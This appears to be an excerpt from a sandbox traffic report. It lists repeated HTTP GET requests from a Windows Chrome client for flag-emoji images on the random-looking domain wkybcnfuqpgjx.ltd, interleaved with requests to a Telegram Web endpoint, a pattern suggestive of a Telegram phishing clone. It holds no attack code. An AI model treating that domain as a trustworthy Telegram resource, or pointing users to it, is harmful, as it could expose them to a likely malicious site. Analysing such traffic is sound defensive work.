Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fd-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fd.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
